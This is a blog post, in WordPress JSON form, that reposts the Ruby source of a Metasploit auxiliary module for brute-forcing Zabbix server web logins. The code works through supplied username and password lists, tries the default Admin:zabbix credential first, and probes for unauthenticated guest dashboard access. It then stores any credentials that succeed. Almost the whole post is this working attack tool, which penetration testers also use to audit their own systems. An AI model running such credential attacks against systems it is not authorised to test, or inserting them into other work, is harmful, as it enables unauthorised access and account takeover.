{"id":59350,"date":"2024-09-01T19:20:26","date_gmt":"2024-09-01T16:20:26","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181071\/zabbix_login.rb.txt"},"modified":"2024-09-01T19:20:26","modified_gmt":"2024-09-01T16:20:26","slug":"zabbix-server-brute-force-utility","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/zabbix-server-brute-force-utility\/","title":{"rendered":"Zabbix Server Brute Force Utility"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

require ‘metasploit\/framework\/login_scanner\/zabbix’
require ‘metasploit\/framework\/credential_collection’<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner<\/p>\n

def initialize
super(
‘Name’ => ‘Zabbix Server Brute Force Utility’,
‘Description’ => %q{
This module attempts to login to Zabbix server instance using username and password
combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
will also test for the Zabbix default login (Admin:zabbix) and guest access.
},
‘Author’ =>
[
‘hdm’
],
‘License’ => MSF_LICENSE
)<\/p>\n

register_options(
[
Opt::RPORT(80),
OptString.new(‘TARGETURI’, [ true, ‘The path to the Zabbix server application’, ‘\/zabbix\/’]),
])
end<\/p>\n

#
# main
#
def run_host(ip)
init_loginscanner(ip)
msg = @scanner.check_setup
if msg
print_brute :level => :error, :ip => rhost, :msg => msg
return
end<\/p>\n

print_brute :level=>:status, :ip=>rhost, :msg=>(“Found Zabbix version #{@scanner.version}”)<\/p>\n

if is_guest_mode_enabled?
print_brute :level => :good, :ip => ip, :msg => “Note: This Zabbix instance has Guest mode enabled”
else
print_brute :level=>:status, :ip=>rhost, :msg=>(“This Zabbix instance has disabled Guest mode”)
end<\/p>\n

bruteforce(ip)
end<\/p>\n

def bruteforce(ip)
@scanner.scan! do |result|
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute :level => :good, :ip => ip, :msg => “Success: ‘#{result.credential}'”
do_report(ip, rport, result)
:next_user
when Metasploit::Model::Login::Status::DENIED_ACCESS
print_brute :level => :status, :ip => ip, :msg => “Correct credentials, but unable to login: ‘#{result.credential}'”
do_report(ip, rport, result)
:next_user
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
if datastore[‘VERBOSE’]print_brute :level => :verror, :ip => ip, :msg => “Could not connect”
end
invalidate_login(
address: ip,
port: rport,
protocol: ‘tcp’,
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status
)
:abort
when Metasploit::Model::Login::Status::INCORRECT
if datastore[‘VERBOSE’]print_brute :level => :verror, :ip => ip, :msg => “Failed: ‘#{result.credential}'”
end
invalidate_login(
address: ip,
port: rport,
protocol: ‘tcp’,
public: result.credential.public,
private: result.credential.private,
realm_key: result.credential.realm_key,
realm_value: result.credential.realm,
status: result.status
)
end
end
end<\/p>\n

def do_report(ip, port, result)
service_data = {
address: ip,
port: port,
service_name: ‘http’,
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
module_fullname: self.fullname,
origin_type: :service,
private_data: result.credential.private,
private_type: :password,
username: result.credential.public,
}.merge(service_data)<\/p>\n

credential_core = create_credential(credential_data)<\/p>\n

login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: result.status
}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

def init_loginscanner(ip)
@cred_collection = build_credential_collection(
username: datastore[‘USERNAME’],
password: datastore[‘PASSWORD’])<\/p>\n

# Always try the default first
@cred_collection.prepend_cred(
Metasploit::Framework::Credential.new(public: ‘Admin’, private: ‘zabbix’)
)<\/p>\n

@scanner = Metasploit::Framework::LoginScanner::Zabbix.new(
configure_http_login_scanner(
uri: datastore[‘TARGETURI’],
cred_details: @cred_collection,
stop_on_success: datastore[‘STOP_ON_SUCCESS’],
bruteforce_speed: datastore[‘BRUTEFORCE_SPEED’],
connection_timeout: 5,
http_username: datastore[‘HttpUsername’],
http_password: datastore[‘HttpPassword’])
)
end<\/p>\n

#
# From the documentation:
#
# “In case of five consecutive failed login attempts, Zabbix interface will pause for 30
# seconds in order to prevent brute force and dictionary attacks.”
#<\/p>\n

# Zabbix enables a Guest mode by default that allows access to the dashboard without auth
def is_guest_mode_enabled?
dashboard_uri = normalize_uri(datastore[‘TARGETURI’] + ‘\/’ + ‘dashboard.php’)
res = send_request_cgi({‘uri’=>dashboard_uri})
if (res && res.code == 200 && res.body.to_s =~ \/<title>.*: Dashboard<\\\/title>\/)
return true
else # Otherwise target is most likely a newer version of Zabbix, so lets try the updated URL.
dashboard_uri = normalize_uri(datastore[‘TARGETURI’] + ‘\/’ + ‘zabbix.php’)
res = send_request_cgi({
‘uri’ => dashboard_uri,
‘vars_get’ => { ‘action’ => ‘dashboard.view’ }
})
if (res && res.code == 200 && res.body.to_s =~ \/<title>.*: Dashboard<\\\/title>\/)
return true
else
return false
end
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘metasploit\/framework\/login_scanner\/zabbix’require ‘metasploit\/framework\/credential_collection’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::AuthBruteinclude Msf::Auxiliary::Reportinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Zabbix Server Brute Force Utility’,‘Description’ => %q{This module attempts to login to Zabbix server instance using username and passwordcombinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Itwill also test for the …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59350","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59350"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59350\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}